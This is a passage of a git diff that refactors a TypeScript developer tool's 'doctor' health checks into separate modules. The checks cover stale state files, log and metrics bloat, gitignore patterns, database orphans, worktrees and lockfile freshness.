format: "unitType/unitId" e.g. "execute-task/M001/S01/T01" - const slashIdx = key.indexOf("/"); - if (slashIdx === -1) continue; - const unitType = key.slice(0, slashIdx); - const unitId = key.slice(slashIdx + 1); - - // Only validate artifact-producing unit types - const { verifyExpectedArtifact } = await import("./auto-recovery.js"); - if (!verifyExpectedArtifact(unitType, unitId, basePath)) { - orphaned.push(key); - } - } - - if (orphaned.length > 0) { - issues.push({ - severity: "warning", - code: "orphaned_completed_units", - scope: "project", - unitId: "project", - message: `${orphaned.length} completed-unit key(s) reference missing artifacts: ${orphaned.slice(0, 3).join(", ")}${orphaned.length > 3 ? "..." : ""}`, - file: ".gsd/completed-units.json", - fixable: true, - }); - - if (shouldFix("orphaned_completed_units")) { - const orphanedSet = new Set(orphaned); - const remaining = keys.filter((key) => !orphanedSet.has(key)); - await saveFile(completedKeysFile, JSON.stringify(remaining)); - fixesApplied.push(`removed ${orphaned.length} orphaned completed-unit key(s)`); - } - } - } - } catch { - // Non-fatal — completed-units check failed - } - - // ── Stale hook state ────────────────────────────────────────────────── - try { - const hookStateFile = join(root, "hook-state.json"); - if (existsSync(hookStateFile)) { - const raw = readFileSync(hookStateFile, "utf-8"); - const state = JSON.parse(raw); - const hasCycleCounts = state.cycleCounts && typeof state.cycleCounts === "object" - && Object.keys(state.cycleCounts).length > 0; - - // Only flag if there are actual cycle counts AND no auto-mode is running - if (hasCycleCounts) { - const lock = readCrashLock(basePath); - const autoRunning = lock ? 
isLockProcessAlive(lock) : false; - - if (!autoRunning) { - issues.push({ - severity: "info", - code: "stale_hook_state", - scope: "project", - unitId: "project", - message: `hook-state.json has ${Object.keys(state.cycleCounts).length} residual cycle count(s) from a previous session`, - file: ".gsd/hook-state.json", - fixable: true, - }); - - if (shouldFix("stale_hook_state")) { - const { clearPersistedHookState } = await import("./post-unit-hooks.js"); - clearPersistedHookState(basePath); - fixesApplied.push("cleared stale hook-state.json"); - } - } - } - } - } catch { - // Non-fatal — hook state check failed - } - - // ── Activity log bloat ──────────────────────────────────────────────── - try { - const activityDir = join(root, "activity"); - if (existsSync(activityDir)) { - const files = readdirSync(activityDir); - let totalSize = 0; - for (const f of files) { - try { - totalSize += statSync(join(activityDir, f)).size; - } catch { - // stat failed — skip - } - } - - const totalMB = totalSize / (1024 * 1024); - const BLOAT_FILE_THRESHOLD = 500; - const BLOAT_SIZE_MB = 100; - - if (files.length > BLOAT_FILE_THRESHOLD || totalMB > BLOAT_SIZE_MB) { - issues.push({ - severity: "warning", - code: "activity_log_bloat", - scope: "project", - unitId: "project", - message: `Activity logs: ${files.length} files, ${totalMB.toFixed(1)}MB (thresholds: ${BLOAT_FILE_THRESHOLD} files / ${BLOAT_SIZE_MB}MB)`, - file: ".gsd/activity/", - fixable: true, - }); - - if (shouldFix("activity_log_bloat")) { - const { pruneActivityLogs } = await import("./activity-log.js"); - pruneActivityLogs(activityDir, 7); // 7-day retention - fixesApplied.push("pruned activity logs (7-day retention)"); - } - } - } - } catch { - // Non-fatal — activity log check failed - } - - // ── STATE.md health ─────────────────────────────────────────────────── - try { - const stateFilePath = resolveGsdRootFile(basePath, "STATE"); - const milestonesPath = milestonesDir(basePath); - - if 
(existsSync(milestonesPath)) { - if (!existsSync(stateFilePath)) { - issues.push({ - severity: "warning", - code: "state_file_missing", - scope: "project", - unitId: "project", - message: "STATE.md is missing — state display will not work", - file: ".gsd/STATE.md", - fixable: true, - }); - - if (shouldFix("state_file_missing")) { - const state = await deriveState(basePath); - await saveFile(stateFilePath, buildStateMarkdownForCheck(state)); - fixesApplied.push("created STATE.md from derived state"); - } - } else { - // Check if STATE.md is stale by comparing active milestone/slice/phase - const currentContent = readFileSync(stateFilePath, "utf-8"); - const state = await deriveState(basePath); - const freshContent = buildStateMarkdownForCheck(state); - - // Extract key fields for comparison — don't compare full content - // since timestamp/formatting differences are normal - const extractFields = (content: string) => { - const milestone = content.match(/\*\*Active Milestone:\*\*\s*(.+)/)?.[1]?.trim() ?? ""; - const slice = content.match(/\*\*Active Slice:\*\*\s*(.+)/)?.[1]?.trim() ?? ""; - const phase = content.match(/\*\*Phase:\*\*\s*(.+)/)?.[1]?.trim() ?? 
""; - return { milestone, slice, phase }; - }; - - const current = extractFields(currentContent); - const fresh = extractFields(freshContent); - - if (current.milestone !== fresh.milestone || current.slice !== fresh.slice || current.phase !== fresh.phase) { - issues.push({ - severity: "warning", - code: "state_file_stale", - scope: "project", - unitId: "project", - message: `STATE.md is stale — shows "${current.phase}" but derived state is "${fresh.phase}"`, - file: ".gsd/STATE.md", - fixable: true, - }); - - if (shouldFix("state_file_stale")) { - await saveFile(stateFilePath, freshContent); - fixesApplied.push("rebuilt STATE.md from derived state"); - } - } - } - } - } catch { - // Non-fatal — STATE.md check failed - } - - // ── Gitignore drift ─────────────────────────────────────────────────── - try { - const gitignorePath = join(basePath, ".gitignore"); - if (existsSync(gitignorePath) && nativeIsRepo(basePath)) { - const content = readFileSync(gitignorePath, "utf-8"); - const existingLines = new Set( - content.split("\n").map(l => l.trim()).filter(l => l && !l.startsWith("#")), - ); - - // Check for critical runtime patterns that must be present - const criticalPatterns = [ - ".gsd/activity/", - ".gsd/runtime/", - ".gsd/auto.lock", - ".gsd/gsd.db", - ".gsd/completed-units.json", - ]; - - // If blanket .gsd/ or .gsd is present, all patterns are covered - const hasBlanketIgnore = existingLines.has(".gsd/") || existingLines.has(".gsd"); - - if (!hasBlanketIgnore) { - const missing = criticalPatterns.filter(p => !existingLines.has(p)); - if (missing.length > 0) { - issues.push({ - severity: "warning", - code: "gitignore_missing_patterns", - scope: "project", - unitId: "project", - message: `${missing.length} critical GSD runtime pattern(s) missing from .gitignore: ${missing.join(", ")}`, - file: ".gitignore", - fixable: true, - }); - - if (shouldFix("gitignore_missing_patterns")) { - ensureGitignore(basePath); - fixesApplied.push("added missing GSD runtime patterns 
to .gitignore"); - } - } - } - } - } catch { - // Non-fatal — gitignore check failed - } - - // ── External state symlink health ────────────────────────────────────── - try { - const localGsd = join(basePath, ".gsd"); - if (existsSync(localGsd)) { - const stat = lstatSync(localGsd); - - // Check for .gsd.migrating (failed migration) - const migratingPath = join(basePath, ".gsd.migrating"); - if (existsSync(migratingPath)) { - issues.push({ - severity: "error", - code: "failed_migration", - scope: "project", - unitId: "project", - message: "Found .gsd.migrating — a previous external state migration failed. State may be incomplete.", - file: ".gsd.migrating", - fixable: true, - }); - - if (shouldFix("failed_migration")) { - if (recoverFailedMigration(basePath)) { - fixesApplied.push("recovered failed migration (.gsd.migrating → .gsd)"); - } - } - } - - // Check symlink target exists - if (stat.isSymbolicLink()) { - try { - realpathSync(localGsd); - } catch { - issues.push({ - severity: "error", - code: "broken_symlink", - scope: "project", - unitId: "project", - message: ".gsd symlink target does not exist. 
External state directory may have been deleted.", - file: ".gsd", - fixable: false, - }); - } - } - } - } catch { - // Non-fatal — external state check failed - } - - // ── Metrics ledger integrity ─────────────────────────────────────────── - try { - const metricsPath = join(root, "metrics.json"); - if (existsSync(metricsPath)) { - try { - const raw = readFileSync(metricsPath, "utf-8"); - const ledger = JSON.parse(raw); - if (ledger.version !== 1 || !Array.isArray(ledger.units)) { - issues.push({ - severity: "warning", - code: "metrics_ledger_corrupt", - scope: "project", - unitId: "project", - message: "metrics.json has an unexpected structure (version !== 1 or units is not an array) — metrics data may be unreliable", - file: ".gsd/metrics.json", - fixable: false, - }); - } - } catch { - issues.push({ - severity: "warning", - code: "metrics_ledger_corrupt", - scope: "project", - unitId: "project", - message: "metrics.json is not valid JSON — metrics data may be corrupt", - file: ".gsd/metrics.json", - fixable: false, - }); - } - } - } catch { - // Non-fatal — metrics check failed - } - - // ── Metrics ledger bloat ────────────────────────────────────────────── - // The metrics ledger has no TTL and grows by one entry per completed unit. - // At 50 units/day a project can accumulate tens of thousands of entries over - // months of use. Prune to the newest 1500 when the threshold is exceeded. 
- try { - const metricsFilePath = join(root, "metrics.json"); - if (existsSync(metricsFilePath)) { - try { - const raw = readFileSync(metricsFilePath, "utf-8"); - const parsed = JSON.parse(raw); - const BLOAT_UNITS_THRESHOLD = 2000; - if (parsed.version === 1 && Array.isArray(parsed.units) && parsed.units.length > BLOAT_UNITS_THRESHOLD) { - const fileSizeMB = (statSync(metricsFilePath).size / (1024 * 1024)).toFixed(1); - issues.push({ - severity: "warning", - code: "metrics_ledger_bloat", - scope: "project", - unitId: "project", - message: `metrics.json has ${parsed.units.length} unit entries (${fileSizeMB}MB) — threshold is ${BLOAT_UNITS_THRESHOLD}. Run /gsd doctor --fix to prune to the newest 1500 entries.`, - file: ".gsd/metrics.json", - fixable: true, - }); - if (shouldFix("metrics_ledger_bloat")) { - const { pruneMetricsLedger } = await import("./metrics.js"); - const removed = pruneMetricsLedger(basePath, 1500); - fixesApplied.push(`pruned metrics ledger: removed ${removed} oldest entries (${parsed.units.length - removed} remain)`); - } - } - } catch { - // JSON parse failed — already handled by the integrity check above - } - } - } catch { - // Non-fatal — metrics bloat check failed - } - - // ── Large planning file detection ────────────────────────────────────── - // Files over 100KB can cause LLM context pressure. Report the worst offenders. 
- try { - const MAX_FILE_BYTES = 100 * 1024; // 100KB - const milestonesPath = milestonesDir(basePath); - if (existsSync(milestonesPath)) { - const largeFiles: Array<{ path: string; sizeKB: number }> = []; - function scanForLargeFiles(dir: string, depth = 0): void { - if (depth > 6) return; - try { - for (const entry of readdirSync(dir)) { - const full = join(dir, entry); - try { - const s = statSync(full); - if (s.isDirectory()) { scanForLargeFiles(full, depth + 1); continue; } - if (entry.endsWith(".md") && s.size > MAX_FILE_BYTES) { - largeFiles.push({ path: full.replace(basePath + "/", ""), sizeKB: Math.round(s.size / 1024) }); - } - } catch { /* skip entry */ } - } - } catch { /* skip dir */ } - } - scanForLargeFiles(milestonesPath); - if (largeFiles.length > 0) { - largeFiles.sort((a, b) => b.sizeKB - a.sizeKB); - const worst = largeFiles[0]!; - issues.push({ - severity: "warning", - code: "large_planning_file", - scope: "project", - unitId: "project", - message: `${largeFiles.length} planning file(s) exceed 100KB — largest: ${worst.path} (${worst.sizeKB}KB). Large files cause LLM context pressure.`, - file: worst.path, - fixable: false, - }); - } - } - } catch { - // Non-fatal — large file scan failed - } - - // ── Snapshot ref bloat ──────────────────────────────────────────────── - // refs/gsd/snapshots/ accumulate over time. Prune to newest 5 per label - // when total count exceeds threshold. 
- try { - if (nativeIsRepo(basePath)) { - const refs = nativeForEachRef(basePath, "refs/gsd/snapshots/"); - if (refs.length > 50) { - issues.push({ - severity: "warning", - code: "snapshot_ref_bloat", - scope: "project", - unitId: "project", - message: `${refs.length} snapshot refs found under refs/gsd/snapshots/ — pruning to newest 5 per label will reclaim git storage`, - fixable: true, - }); - - if (shouldFix("snapshot_ref_bloat")) { - const byLabel = new Map(); - for (const ref of refs) { - const parts = ref.split("/"); - const label = parts.slice(0, -1).join("/"); - if (!byLabel.has(label)) byLabel.set(label, []); - byLabel.get(label)!.push(ref); - } - let pruned = 0; - for (const [, labelRefs] of byLabel) { - const sorted = labelRefs.sort(); - for (const old of sorted.slice(0, -5)) { - try { - nativeUpdateRef(basePath, old); - pruned++; - } catch { /* skip */ } - } - } - if (pruned > 0) { - fixesApplied.push(`pruned ${pruned} old snapshot ref(s)`); - } - } - } - } - } catch { - // Non-fatal — snapshot ref check failed - } -} - -/** - * Build STATE.md markdown content from derived state. - * Local helper used by checkRuntimeHealth for STATE.md drift detection and repair. - */ -function buildStateMarkdownForCheck(state: Awaited>): string { - const lines: string[] = []; - lines.push("# GSD State", ""); - - const activeMilestone = state.activeMilestone - ? `${state.activeMilestone.id}: ${state.activeMilestone.title}` - : "None"; - const activeSlice = state.activeSlice - ? 
`${state.activeSlice.id}: ${state.activeSlice.title}` - : "None"; - - lines.push(`**Active Milestone:** ${activeMilestone}`); - lines.push(`**Active Slice:** ${activeSlice}`); - lines.push(`**Phase:** ${state.phase}`); - if (state.requirements) { - lines.push(`**Requirements Status:** ${state.requirements.active} active · ${state.requirements.validated} validated · ${state.requirements.deferred} deferred · ${state.requirements.outOfScope} out of scope`); - } - lines.push(""); - lines.push("## Milestone Registry"); - - for (const entry of state.registry) { - const glyph = entry.status === "complete" ? "\u2705" : entry.status === "active" ? "\uD83D\uDD04" : entry.status === "parked" ? "\u23F8\uFE0F" : "\u2B1C"; - lines.push(`- ${glyph} **${entry.id}:** ${entry.title}`); - } - - lines.push(""); - lines.push("## Recent Decisions"); - if (state.recentDecisions.length > 0) { - for (const decision of state.recentDecisions) lines.push(`- ${decision}`); - } else { - lines.push("- None recorded"); - } - - lines.push(""); - lines.push("## Blockers"); - if (state.blockers.length > 0) { - for (const blocker of state.blockers) lines.push(`- ${blocker}`); - } else { - lines.push("- None"); - } - - lines.push(""); - lines.push("## Next Action"); - lines.push(state.nextAction || "None"); - lines.push(""); - - return lines.join("\n"); -} - -// ── Global Health Checks ──────────────────────────────────────────────────── -// Cross-project checks that scan ~/.gsd/ rather than a specific project directory. - -/** - * Check for orphaned project state directories in ~/.gsd/projects/. - * - * A project directory is orphaned when its recorded gitRoot no longer exists - * on disk — the repo was deleted, moved, or the external drive was unmounted. - * These directories accumulate silently and waste disk space. - * - * Severity: info — orphaned state is harmless but takes disk space. - * Fixable: yes — rmSync the directory. Never auto-fixed at fixLevel="task". 
- */ -export async function checkGlobalHealth( - issues: DoctorIssue[], - fixesApplied: string[], - shouldFix: (code: DoctorIssueCode) => boolean, -): Promise { - try { - const projectsDir = externalProjectsRoot(); - - if (!existsSync(projectsDir)) return; - - let entries: string[]; - try { - entries = readdirSync(projectsDir, { withFileTypes: true }) - .filter(e => e.isDirectory()) - .map(e => e.name); - } catch { - return; // Can't read directory — skip - } - - if (entries.length === 0) return; - - const orphaned: Array<{ hash: string; gitRoot: string; remoteUrl: string }> = []; - let unknownCount = 0; - - for (const hash of entries) { - const dirPath = join(projectsDir, hash); - const meta = readRepoMeta(dirPath); - if (!meta) { - unknownCount++; - continue; - } - if (!existsSync(meta.gitRoot)) { - orphaned.push({ hash, gitRoot: meta.gitRoot, remoteUrl: meta.remoteUrl }); - } - } - - if (orphaned.length === 0) return; - - const labels = orphaned.slice(0, 3).map(o => o.gitRoot).join(", "); - const overflow = orphaned.length > 3 ? ` (+${orphaned.length - 3} more)` : ""; - const unknownNote = unknownCount > 0 ? ` — ${unknownCount} additional director${unknownCount === 1 ? "y" : "ies"} have no metadata yet (open those repos once to register them)` : ""; - - issues.push({ - severity: "info", - code: "orphaned_project_state", - scope: "project", - unitId: "global", - message: `${orphaned.length} orphaned GSD project state director${orphaned.length === 1 ? "y" : "ies"} in ${projectsDir} whose git root no longer exists: ${labels}${overflow}${unknownNote}. 
Run /gsd cleanup projects to audit or /gsd cleanup projects --fix to reclaim disk space.`, - file: projectsDir, - fixable: true, - }); - - if (shouldFix("orphaned_project_state")) { - let removed = 0; - for (const { hash } of orphaned) { - try { - rmSync(join(projectsDir, hash), { recursive: true, force: true }); - removed++; - } catch { - // Individual removal failure is non-fatal — continue with remaining - } - } - fixesApplied.push(`removed ${removed} orphaned project state director${removed === 1 ? "y" : "ies"} from ${projectsDir}`); - } - } catch { - // Non-fatal — global health check must not block per-project doctor - } -} +// Re-exports for backward compatibility +export { checkGitHealth } from "./doctor-git-checks.js"; +export { checkRuntimeHealth } from "./doctor-runtime-checks.js"; +export { checkGlobalHealth } from "./doctor-global-checks.js"; +export { checkEngineHealth } from "./doctor-engine-checks.js"; diff --git a/src/resources/extensions/gsd/doctor-engine-checks.ts b/src/resources/extensions/gsd/doctor-engine-checks.ts new file mode 100644 index 000000000..8b74dcac4 --- /dev/null +++ b/src/resources/extensions/gsd/doctor-engine-checks.ts @@ -0,0 +1,182 @@ +import { existsSync, statSync } from "node:fs"; +import { join } from "node:path"; + +import type { DoctorIssue } from "./doctor-types.js"; +import { isDbAvailable, _getAdapter } from "./gsd-db.js"; +import { resolveMilestoneFile } from "./paths.js"; +import { deriveState } from "./state.js"; +import { readEvents } from "./workflow-events.js"; +import { renderAllProjections } from "./workflow-projections.js"; + +export async function checkEngineHealth( + basePath: string, + issues: DoctorIssue[], + fixesApplied: string[], +): Promise { + // ── DB constraint violation detection (full doctor only, not pre-dispatch per D-10) ── + try { + if (isDbAvailable()) { + const adapter = _getAdapter()!; + + // a. 
Orphaned tasks (task.slice_id points to non-existent slice) + try { + const orphanedTasks = adapter + .prepare( + `SELECT t.id, t.slice_id, t.milestone_id + FROM tasks t + LEFT JOIN slices s ON t.milestone_id = s.milestone_id AND t.slice_id = s.id + WHERE s.id IS NULL`, + ) + .all() as Array<{ id: string; slice_id: string; milestone_id: string }>; + + for (const row of orphanedTasks) { + issues.push({ + severity: "error", + code: "db_orphaned_task", + scope: "task", + unitId: `${row.milestone_id}/${row.slice_id}/${row.id}`, + message: `Task ${row.id} references slice ${row.slice_id} in milestone ${row.milestone_id} but no such slice exists in the database`, + fixable: false, + }); + } + } catch { + // Non-fatal — orphaned task check failed + } + + // b. Orphaned slices (slice.milestone_id points to non-existent milestone) + try { + const orphanedSlices = adapter + .prepare( + `SELECT s.id, s.milestone_id + FROM slices s + LEFT JOIN milestones m ON s.milestone_id = m.id + WHERE m.id IS NULL`, + ) + .all() as Array<{ id: string; milestone_id: string }>; + + for (const row of orphanedSlices) { + issues.push({ + severity: "error", + code: "db_orphaned_slice", + scope: "slice", + unitId: `${row.milestone_id}/${row.id}`, + message: `Slice ${row.id} references milestone ${row.milestone_id} but no such milestone exists in the database`, + fixable: false, + }); + } + } catch { + // Non-fatal — orphaned slice check failed + } + + // c. 
Tasks marked complete without summaries + try { + const doneTasks = adapter + .prepare( + `SELECT id, slice_id, milestone_id FROM tasks + WHERE status = 'done' AND (summary IS NULL OR summary = '')`, + ) + .all() as Array<{ id: string; slice_id: string; milestone_id: string }>; + + for (const row of doneTasks) { + issues.push({ + severity: "warning", + code: "db_done_task_no_summary", + scope: "task", + unitId: `${row.milestone_id}/${row.slice_id}/${row.id}`, + message: `Task ${row.id} is marked done but has no summary in the database`, + fixable: false, + }); + } + } catch { + // Non-fatal — done-task-no-summary check failed + } + + // d. Duplicate entity IDs (safety check) + try { + const dupMilestones = adapter + .prepare("SELECT id, COUNT(*) as cnt FROM milestones GROUP BY id HAVING cnt > 1") + .all() as Array<{ id: string; cnt: number }>; + for (const row of dupMilestones) { + issues.push({ + severity: "error", + code: "db_duplicate_id", + scope: "milestone", + unitId: row.id, + message: `Duplicate milestone ID "${row.id}" appears ${row.cnt} times in the database`, + fixable: false, + }); + } + + const dupSlices = adapter + .prepare("SELECT id, milestone_id, COUNT(*) as cnt FROM slices GROUP BY id, milestone_id HAVING cnt > 1") + .all() as Array<{ id: string; milestone_id: string; cnt: number }>; + for (const row of dupSlices) { + issues.push({ + severity: "error", + code: "db_duplicate_id", + scope: "slice", + unitId: `${row.milestone_id}/${row.id}`, + message: `Duplicate slice ID "${row.id}" in milestone ${row.milestone_id} appears ${row.cnt} times`, + fixable: false, + }); + } + + const dupTasks = adapter + .prepare("SELECT id, slice_id, milestone_id, COUNT(*) as cnt FROM tasks GROUP BY id, slice_id, milestone_id HAVING cnt > 1") + .all() as Array<{ id: string; slice_id: string; milestone_id: string; cnt: number }>; + for (const row of dupTasks) { + issues.push({ + severity: "error", + code: "db_duplicate_id", + scope: "task", + unitId: 
`${row.milestone_id}/${row.slice_id}/${row.id}`, + message: `Duplicate task ID "${row.id}" in slice ${row.slice_id} appears ${row.cnt} times`, + fixable: false, + }); + } + } catch { + // Non-fatal — duplicate ID check failed + } + } + } catch { + // Non-fatal — DB constraint checks failed entirely + } + + // ── Projection drift detection ────────────────────────────────────────── + // If the DB is available, check whether markdown projections are stale + // relative to the event log and re-render them. + try { + if (isDbAvailable()) { + const eventLogPath = join(basePath, ".gsd", "event-log.jsonl"); + const events = readEvents(eventLogPath); + if (events.length > 0) { + const lastEventTs = new Date(events[events.length - 1]!.ts).getTime(); + const state = await deriveState(basePath); + for (const milestone of state.registry) { + if (milestone.status === "complete") continue; + const roadmapPath = resolveMilestoneFile(basePath, milestone.id, "ROADMAP"); + if (!roadmapPath || !existsSync(roadmapPath)) { + try { + await renderAllProjections(basePath, milestone.id); + fixesApplied.push(`re-rendered missing projections for ${milestone.id}`); + } catch { + // Non-fatal — projection re-render failed + } + continue; + } + const projectionMtime = statSync(roadmapPath).mtimeMs; + if (lastEventTs > projectionMtime) { + try { + await renderAllProjections(basePath, milestone.id); + fixesApplied.push(`re-rendered stale projections for ${milestone.id}`); + } catch { + // Non-fatal — projection re-render failed + } + } + } + } + } + } catch { + // Non-fatal — projection drift check must never block doctor + } +} diff --git a/src/resources/extensions/gsd/doctor-environment.ts b/src/resources/extensions/gsd/doctor-environment.ts index 61f61cd85..563afdbb4 100644 --- a/src/resources/extensions/gsd/doctor-environment.ts +++ b/src/resources/extensions/gsd/doctor-environment.ts @@ -37,6 +37,29 @@ const CMD_TIMEOUT = 5_000; // ── Helpers 
──────────────────────────────────────────────────────────────── +/** Worktree sentinel — path segment that marks an auto-worktree directory. */ +const WORKTREE_PATH_SEGMENT = `${join(".gsd", "worktrees")}/`; + +/** + * Resolve the project root when running inside a `.gsd/worktrees//` + * auto-worktree. Returns `null` if not in a worktree. + * + * Detection order: + * 1. `GSD_WORKTREE` env var (set by the worktree launcher) + * 2. `.gsd/worktrees/` segment in basePath + */ +function resolveWorktreeProjectRoot(basePath: string): string | null { + const envRoot = process.env.GSD_WORKTREE; + if (envRoot) return envRoot; + + const normalised = basePath.replace(/\\/g, "/"); + const idx = normalised.indexOf(WORKTREE_PATH_SEGMENT.replace(/\\/g, "/")); + if (idx === -1) return null; + + // Everything before `.gsd/worktrees/` is the project root + return basePath.slice(0, idx); +} + function tryExec(cmd: string, cwd: string): string | null { try { return execSync(cmd, { @@ -111,6 +134,14 @@ function checkDependenciesInstalled(basePath: string): EnvironmentCheckResult | const nodeModules = join(basePath, "node_modules"); if (!existsSync(nodeModules)) { + // In auto-worktrees node_modules is absent by design — the worktree + // symlinks to (or expects) the project root's copy. Fall back to + // checking the project root before reporting an error (#2303). 
+ const projectRoot = resolveWorktreeProjectRoot(basePath); + if (projectRoot && existsSync(join(projectRoot, "node_modules"))) { + return { name: "dependencies", status: "ok", message: "Dependencies installed (project root)" }; + } + return { name: "dependencies", status: "error", @@ -118,21 +149,44 @@ function checkDependenciesInstalled(basePath: string): EnvironmentCheckResult | }; } - // Check if lockfile is newer than node_modules - const lockfiles = ["package-lock.json", "yarn.lock", "pnpm-lock.yaml"]; - for (const lockfile of lockfiles) { - const lockPath = join(basePath, lockfile); + // Check if lockfile is newer than the last install. + // + // Each package manager writes a metadata marker inside node_modules on + // every install. Comparing the lockfile mtime against the marker is + // reliable; comparing against the node_modules *directory* mtime is not, + // because directory mtime only changes when entries are added or removed + // — not when files inside it are updated. (#1974) + const lockfiles: Array<{ lock: string; markers: string[] }> = [ + { lock: "package-lock.json", markers: ["node_modules/.package-lock.json"] }, + { lock: "yarn.lock", markers: ["node_modules/.yarn-integrity"] }, + { lock: "pnpm-lock.yaml", markers: ["node_modules/.modules.yaml"] }, + ]; + + for (const { lock, markers } of lockfiles) { + const lockPath = join(basePath, lock); if (!existsSync(lockPath)) continue; try { const lockMtime = statSync(lockPath).mtimeMs; - const nmMtime = statSync(nodeModules).mtimeMs; - if (lockMtime > nmMtime) { + // Prefer the package manager's marker file; fall back to directory mtime + // only when no marker exists (e.g., manually created node_modules). 
+ let installMtime = 0; + for (const marker of markers) { + const markerPath = join(basePath, marker); + if (existsSync(markerPath)) { + installMtime = Math.max(installMtime, statSync(markerPath).mtimeMs); + } + } + if (installMtime === 0) { + installMtime = statSync(nodeModules).mtimeMs; + } + + if (lockMtime > installMtime) { return { name: "dependencies", status: "warning", - message: `${lockfile} is newer than node_modules — dependencies may be stale`, + message: `${lock} is newer than node_modules — dependencies may be stale`, detail: `Run npm install / yarn / pnpm install to update`, }; } diff --git a/src/resources/extensions/gsd/doctor-git-checks.ts b/src/resources/extensions/gsd/doctor-git-checks.ts new file mode 100644 index 000000000..36b2eb5eb --- /dev/null +++ b/src/resources/extensions/gsd/doctor-git-checks.ts @@ -0,0 +1,489 @@ +import { existsSync, readdirSync, realpathSync, rmSync, statSync } from "node:fs"; +import { join, sep } from "node:path"; + +import type { DoctorIssue, DoctorIssueCode } from "./doctor-types.js"; +import { loadFile } from "./files.js"; +import { parseRoadmap as parseLegacyRoadmap } from "./parsers-legacy.js"; +import { isDbAvailable, getMilestoneSlices } from "./gsd-db.js"; +import { resolveMilestoneFile } from "./paths.js"; +import { deriveState, isMilestoneComplete } from "./state.js"; +import { listWorktrees, resolveGitDir, worktreesDir } from "./worktree-manager.js"; +import { abortAndReset } from "./git-self-heal.js"; +import { RUNTIME_EXCLUSION_PATHS, resolveMilestoneIntegrationBranch, writeIntegrationBranch } from "./git-service.js"; +import { nativeIsRepo, nativeWorktreeList, nativeWorktreeRemove, nativeBranchList, nativeBranchDelete, nativeLsFiles, nativeRmCached, nativeHasChanges, nativeLastCommitEpoch, nativeGetCurrentBranch, nativeAddAllWithExclusions, nativeCommit } from "./native-git-bridge.js"; +import { getAllWorktreeHealth } from "./worktree-health.js"; +import { loadEffectiveGSDPreferences } from 
"./preferences.js"; + +/** + * Returns true if the directory contains only doctor artifacts + * (e.g. `.gsd/doctor-history.jsonl`). These dirs are created by + * appendDoctorHistory() writing to worktree-scoped paths during the audit + * and should not be flagged as orphaned worktrees (#3105). + */ +function isDoctorArtifactOnly(dirPath: string): boolean { + try { + const entries = readdirSync(dirPath); + // Empty dir — not a doctor artifact, still orphaned + if (entries.length === 0) return false; + // Only a .gsd subdirectory + if (entries.length === 1 && entries[0] === ".gsd") { + const gsdEntries = readdirSync(join(dirPath, ".gsd")); + return gsdEntries.length <= 1 && gsdEntries.every(e => e === "doctor-history.jsonl"); + } + return false; + } catch { + return false; + } +} + +export async function checkGitHealth( + basePath: string, + issues: DoctorIssue[], + fixesApplied: string[], + shouldFix: (code: DoctorIssueCode) => boolean, + isolationMode: "none" | "worktree" | "branch" = "none", +): Promise { + // Degrade gracefully if not a git repo + if (!nativeIsRepo(basePath)) { + return; // Not a git repo — skip all git health checks + } + + const gitDir = resolveGitDir(basePath); + + // ── Orphaned auto-worktrees & Stale milestone branches ──────────────── + // These checks only apply in worktree/branch modes — skip in none mode + // where no milestone worktrees or branches are created. 
+ if (isolationMode !== "none") { + try { + const worktrees = listWorktrees(basePath); + const milestoneWorktrees = worktrees.filter(wt => wt.branch.startsWith("milestone/")); + + // Load roadmap state once for cross-referencing + const state = await deriveState(basePath); + + for (const wt of milestoneWorktrees) { + // Extract milestone ID from branch name "milestone/M001" → "M001" + const milestoneId = wt.branch.replace(/^milestone\//, ""); + const milestoneEntry = state.registry.find(m => m.id === milestoneId); + + // Check if milestone is complete via roadmap + let isComplete = false; + if (milestoneEntry) { + if (isDbAvailable()) { + const dbSlices = getMilestoneSlices(milestoneId); + isComplete = dbSlices.length > 0 && dbSlices.every(s => s.status === "complete"); + } else { + const roadmapPath = resolveMilestoneFile(basePath, milestoneId, "ROADMAP"); + const roadmapContent = roadmapPath ? await loadFile(roadmapPath) : null; + if (roadmapContent) { + const roadmap = parseLegacyRoadmap(roadmapContent); + isComplete = isMilestoneComplete(roadmap); + } + } + // When DB unavailable and no roadmap, isComplete stays false + } + + if (isComplete) { + issues.push({ + severity: "warning", + code: "orphaned_auto_worktree", + scope: "milestone", + unitId: milestoneId, + message: `Worktree for completed milestone ${milestoneId} still exists at ${wt.path}`, + fixable: true, + }); + + if (shouldFix("orphaned_auto_worktree")) { + // If cwd is inside the worktree, chdir out first — matching the + // pattern in removeWorktree() (#1946). Without this, git cannot + // remove the worktree and the doctor enters a deadlock where it + // detects the orphan every run but never cleans it up. 
+ const cwd = process.cwd(); + if (wt.path === cwd || cwd.startsWith(wt.path + sep)) { + try { + process.chdir(basePath); + } catch { + fixesApplied.push(`skipped removing worktree at ${wt.path} (cannot chdir to basePath)`); + continue; + } + } + try { + nativeWorktreeRemove(basePath, wt.path, true); + fixesApplied.push(`removed orphaned worktree ${wt.path}`); + } catch { + fixesApplied.push(`failed to remove worktree ${wt.path}`); + } + } + } + } + + // ── Stale milestone branches ───────────────────────────────────────── + try { + const branches = nativeBranchList(basePath, "milestone/*"); + if (branches.length > 0) { + const worktreeBranches = new Set(milestoneWorktrees.map(wt => wt.branch)); + + for (const branch of branches) { + // Skip branches that have a worktree (handled above) + if (worktreeBranches.has(branch)) continue; + + const milestoneId = branch.replace(/^milestone\//, ""); + const roadmapPath = resolveMilestoneFile(basePath, milestoneId, "ROADMAP"); + let branchMilestoneComplete = false; + if (isDbAvailable()) { + const dbSlices = getMilestoneSlices(milestoneId); + branchMilestoneComplete = dbSlices.length > 0 && dbSlices.every(s => s.status === "complete"); + } else { + const roadmapContent = roadmapPath ? 
